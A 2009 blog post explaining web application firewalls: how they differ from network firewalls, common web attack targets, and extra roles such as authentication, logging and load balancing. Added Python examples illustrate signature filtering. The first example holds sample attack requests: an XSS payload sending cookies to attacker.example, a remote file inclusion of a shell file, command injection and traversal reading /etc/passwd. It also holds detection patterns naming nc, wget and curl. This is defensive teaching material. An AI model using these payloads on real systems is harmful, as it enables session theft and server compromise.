Johanne Ulloa

Why a WAF

by admin on Sep.01, 2009, under WAF

What is a WAF?

A WAF (Web Application Firewall) is a software product or an appliance placed between the network firewall and the web server. Its main goal is to protect against application-layer attacks such as SQL injection, cross-site scripting, code injection and remote file inclusion.

I already have a network firewall. Do I need a WAF?

The network firewall decides on source and destination (IP address and port). The WAF decides on content. Compare it with a border checkpoint: first your passport is checked (this is the network firewall's job), then your luggage is searched (this is the WAF's job). The two actions are complementary, and both are required: a request carrying an SQL injection arrives on the same destination port 80 as a legitimate one, so the packet filter has no basis on which to drop it.

Why is a WAF now mandatory in a web infrastructure?

According to a Gartner study, 75% of attacks target the application layer, and two thirds of web applications are vulnerable. Web applications are exposed by nature: compared with network attacks, web attacks are very easy to carry out, and the return on investment for the attacker is very high. This is why web attacks are so attractive to attackers, and why it is so important to deploy a WAF that protects against them.

[Figure: web attacks - complexity and ROI. Easy to attack and high ROI for hackers]

Web attacks: what are the targets and what are the impacts?

  • The user: web attacks often target the user, in most cases to steal the user's session cookie. Once the attacker has the session cookie, they can perform on the web application any action the user could perform.
  • The web server: the most frequent impacts are:
    • Content modification (defacement). The impact of modifying a site depends on how sensitive the company is about its image;
    • Adding illicit files (pornographic content, malware, etc.), or adding files used to conduct a phishing attack;
    • Access to documents that are not supposed to be reachable through the web server;
    • Remote control of the web server (command injection);
    • Denial of service: for example, with a small Perl script (Slowloris) an attacker recently showed that an HTTP server can be taken down simply by holding many connections open with incomplete requests.
  • The application: here the goal is to make the web application behave differently than intended, for example to change the price of a product.
  • The database: this is the attacker's preferred target. The web server is merely the tool used to reach the data. The impacts range from theft to deletion or alteration of data. Unfortunately many data thefts go completely unnoticed, because the stolen data is copied rather than removed: the server keeps working normally after the "intrusion".
  • Web services: they are not immune either. Increasingly deployed, their close interaction with databases makes them a prime target.
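As an added illustration (this is not code from the original post), the following Python script puts the two checks from the border-checkpoint comparison side by side and runs them over constructed requests aimed at the targets just listed: a session-cookie-stealing script in a POST body, an SQL injection, a directory traversal against the server, a remote file inclusion and a command injection. The internal IP address, the signatures and the sample requests are all assumptions made up for the example; a real WAF rule set is far larger and tuned against false positives.

```python
import re
from urllib.parse import unquote_plus

# Layer 3/4 policy as a network firewall sees it (constructed): anyone may
# reach the web server on 80/443 and nothing else.  The payload is never read.
WEB_SERVER_IP = "10.0.0.10"          # assumption: internal address of the web server
ALLOWED_PORTS = {80, 443}


def network_firewall_allows(dst_ip, dst_port):
    """The passport check: addresses and ports only."""
    return dst_ip == WEB_SERVER_IP and dst_port in ALLOWED_PORTS


# Layer 7 signatures for the attack classes the post names (constructed and
# deliberately small).  Each rule is (name, compiled pattern).
RULES = [
    ("sql_injection",
     re.compile(r"""['"]\s*(?:or|and)\s+[\w'"]+\s*=\s*[\w'"]+|union\s+select|;\s*drop\s+table""", re.I)),
    ("xss",
     re.compile(r"<script\b|javascript:|\bon\w+\s*=|document\.cookie", re.I)),
    ("path_traversal",
     re.compile(r"\.\./|\.\.\\|%2e%2e(?:/|\\|%)", re.I)),
    ("remote_file_inclusion",
     re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I)),
    ("command_injection",
     re.compile(r"[;|`]\s*(?:cat|ls|id|wget|curl|nc)\b", re.I)),
]


def parse_request(raw):
    """Splits a raw HTTP/1.x request into the surfaces a WAF inspects."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers,
            "body": body.decode("latin-1")}


def inspect(request):
    """The luggage search: returns the names of the rules the request triggers
    (empty list = clean).  Every surface is URL-decoded first, otherwise %27
    or + would hide a payload from the signatures."""
    surfaces = [unquote_plus(request["target"]), unquote_plus(request["body"])]
    surfaces += [unquote_plus(v) for v in request["headers"].values()]
    return [name for name, pat in RULES if any(pat.search(s) for s in surfaces)]


def evaluate(dst_port, raw):
    """Runs both layers on one request and reports each verdict."""
    if not network_firewall_allows(WEB_SERVER_IP, dst_port):
        return {"network_firewall": "drop", "waf": "not reached", "rules": []}
    hits = inspect(parse_request(raw))
    return {"network_firewall": "pass", "waf": "block" if hits else "pass", "rules": hits}


# Constructed sample traffic.  All of it is addressed to port 80, so the
# network firewall passes every one of these; only the content differs.
SAMPLES = {
    "benign":    b"GET /products?id=42 HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    "sqli":      b"GET /products?id=42'+OR+'1'%3D'1 HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    "xss":       (b"POST /comments HTTP/1.1\r\nHost: shop.example\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                  b"text=%3Cscript%3Enew+Image%28%29.src%3D%27http%3A%2F%2Fattacker.example"
                  b"%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"),
    "traversal": b"GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    "rfi":       b"GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    "cmdi":      b"GET /tools/ping?host=127.0.0.1%3Bcat+/etc/passwd HTTP/1.1\r\nHost: shop.example\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:10s} {evaluate(80, raw)}")
```

Two points the script makes that the analogy alone does not: the network firewall returns the same verdict for all six requests, because nothing it looks at differs; and the decoding step in inspect() is what lets the traversal rule see the `../` hidden behind `%2f`. The cost of signature matching is visible too: a legitimate URL such as /redirect?url=https://... would trip the remote file inclusion rule, which is why production rule sets need tuning per application.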

[Figure: web attacks - targets. Users, web server, web application and database are targeted]

What other aspects of security can the web application firewall handle?

The web application firewall sits upstream of the web applications it protects, so it is natural to have it perform authentication as well. This is particularly useful when you want to make a web application securely available on the Internet. The WAF can also virtualize the web infrastructure: it can expose web server names that differ from those used internally. In the same way, it makes publishing internal web applications on the Internet easy, since the web server does not have to be moved to a specific network zone. Finally, the WAF can provide evidence of intrusion attempts: every request is logged, including the headers and the POSTed data, which web servers do not normally record.
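The three extra jobs described in this paragraph, as an added Python example that is not part of the original post: pre-authentication of an internal application published through the WAF, virtualization of the server names, and a full-request audit record. The host names, the session store, the cookie name WAFSESSION and the sample requests are constructed for the example; a real deployment would back VALID_SESSIONS with an SSO or directory lookup.

```python
import re
from datetime import datetime, timezone

# Constructed virtualization table: the name the Internet sees -> the server
# name used internally.  Nothing about the internal naming reaches clients.
VIRTUAL_HOSTS = {
    "www.example.com":      "web01.corp.internal",
    "intranet.example.com": "intranet01.corp.internal",   # internal app published through the WAF
}
# Constructed pre-authentication policy: hosts whose every path needs a session.
PRE_AUTH_HOSTS = {"intranet.example.com"}
# Assumption: stand-in for the WAF's real session store.
VALID_SESSIONS = {"4f9d2c7e": "alice"}

AUDIT_LOG = []   # one entry per request, whatever the verdict


def _parse_cookies(header):
    return dict(part.strip().split("=", 1) for part in header.split(";") if "=" in part)


def _redact(headers, body):
    """Logging headers and POSTed data is the evidence the post asks for, but
    the log must not become a credential store: mask secrets before writing."""
    safe_headers = {k: ("[REDACTED]" if k in ("cookie", "authorization") else v)
                    for k, v in headers.items()}
    safe_body = re.sub(r"(?i)(password|passwd|pwd)=[^&]*", r"\1=[REDACTED]", body)
    return safe_headers, safe_body


def authenticate(request):
    """Returns the user name for a valid session, None when the host needs no
    pre-authentication, and False when a session is required but missing."""
    host = request["headers"].get("host", "")
    if host not in PRE_AUTH_HOSTS:
        return None
    token = _parse_cookies(request["headers"].get("cookie", "")).get("WAFSESSION")
    return VALID_SESSIONS.get(token, False)


def handle(request, client_ip):
    """Authenticate, virtualize the host name, and log the complete request.
    Returns the HTTP status the client gets and the request forwarded upstream."""
    headers, body = _redact(request["headers"], request["body"])
    entry = {"ts": datetime.now(timezone.utc).isoformat(), "client": client_ip,
             "method": request["method"], "path": request["path"],
             "headers": headers, "body": body}   # web servers log neither of these two
    AUDIT_LOG.append(entry)
    user = authenticate(request)
    if user is False:
        entry["verdict"] = "401 authentication required"
        return {"status": 401, "forward": None}
    internal = VIRTUAL_HOSTS.get(request["headers"].get("host", ""))
    if internal is None:
        entry["verdict"] = "404 unknown virtual host"
        return {"status": 404, "forward": None}
    fwd_headers = dict(request["headers"], host=internal, **{"x-forwarded-for": client_ip})
    if user:
        fwd_headers["x-authenticated-user"] = user   # the backend trusts the WAF for identity
    entry["verdict"] = f"forward to {internal}"
    return {"status": 200, "forward": dict(request, headers=fwd_headers)}


# Constructed sample requests (already parsed; header names lower-cased).
SAMPLE_PUBLIC = {"method": "POST", "path": "/login",
                 "headers": {"host": "www.example.com",
                             "content-type": "application/x-www-form-urlencoded"},
                 "body": "user=bob&password=hunter2"}
SAMPLE_INTRANET_ANON = {"method": "GET", "path": "/payroll",
                        "headers": {"host": "intranet.example.com"}, "body": ""}
SAMPLE_INTRANET_AUTH = {"method": "GET", "path": "/payroll",
                        "headers": {"host": "intranet.example.com",
                                    "cookie": "WAFSESSION=4f9d2c7e"}, "body": ""}
```

The forwarded request still carries the real password to the application (it has to), while the audit record keeps only `password=[REDACTED]`; the same distinction applies to the Cookie header. Because the backend receives an x-authenticated-user header it did not compute, it must only accept that header from the WAF's address, otherwise any client that can reach the backend directly could impersonate a user.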

Security is taken into account during development. Do I still need a WAF?

Securing an application throughout its lifecycle requires full control at every stage: security must be considered from the design phase, throughout development, and in operation. In practice the level of control at these different stages is often insufficient to reach the required level of security, so these methods must be complemented by a web application firewall that reduces the exposed attack surface. In addition, the WAF is a remedy against attacks that target the web server itself (vulnerabilities in IIS, Apache, etc., such as directory traversal, or denial of service, for example Slowloris). Web application firewalls and secure development practices are complementary.

Does the web application firewall do anything other than security?

Yes. The web application firewall also helps accelerate web traffic, especially when the web servers are overloaded: much of the work previously done by the web server (serving static pages, SSL encryption) is taken over by the WAF. The main benefit is that the web server keeps more resources for the dynamic pages. The WAF can also distribute the load across several web servers and ensure their high availability, which avoids a complex high-availability setup on the servers themselves and removes the need for a separate load balancer in front of them.
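The routing side of this paragraph as an added Python example (not code from the original post): a front-end policy that serves static files itself, spreads dynamic requests over the backends that pass health checks, and keeps a client with a session on one backend. The backend names, the static extension list, the failure threshold and the use of a CRC for session affinity are assumptions made for the example; SSL termination is mentioned in the post but not modelled here.

```python
import os
import zlib

STATIC_EXTENSIONS = {".css", ".js", ".png", ".jpg", ".gif", ".ico"}   # constructed list
FAIL_THRESHOLD = 3   # assumption: consecutive failed probes before a backend is pulled


class FrontEnd:
    """Load distribution and high availability as seen from the WAF."""

    def __init__(self, backends):
        self.backends = list(backends)
        self.failed_probes = {b: 0 for b in self.backends}
        self._rr = 0   # round-robin cursor

    def record_probe(self, backend, healthy):
        """Called by the health checker after each probe of a backend.  One
        good probe clears the counter, so a recovered server returns to the pool."""
        self.failed_probes[backend] = 0 if healthy else self.failed_probes[backend] + 1

    def healthy(self):
        return [b for b in self.backends if self.failed_probes[b] < FAIL_THRESHOLD]

    def route(self, path, session_id=None):
        """Returns ("local", None) for static content served by the front end
        itself, ("backend", name) for dynamic pages, or ("unavailable", None)
        when every backend has been pulled."""
        ext = os.path.splitext(path.split("?", 1)[0])[1].lower()
        if ext in STATIC_EXTENSIONS:
            return ("local", None)          # never consumes a backend worker
        pool = self.healthy()
        if not pool:
            return ("unavailable", None)
        if session_id is not None:
            # Session affinity: an application that keeps state in memory needs
            # the same client to land on the same server while its session lives.
            return ("backend", pool[zlib.crc32(session_id.encode()) % len(pool)])
        backend = pool[self._rr % len(pool)]
        self._rr += 1
        return ("backend", backend)


if __name__ == "__main__":
    fe = FrontEnd(["web01", "web02"])
    for p in ("/static/app.css", "/cart", "/cart"):
        print(p, fe.route(p))
    for _ in range(FAIL_THRESHOLD):
        fe.record_probe("web02", False)
    print("after web02 failed:", fe.route("/cart"), fe.healthy())
```

The affinity rule is the usual trade-off of this design: hashing the session id keeps a user on one server, but when the pool changes size the hash lands elsewhere and in-memory sessions on the old server are lost, which is why applications behind a load balancer are better off storing session state in a shared store.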

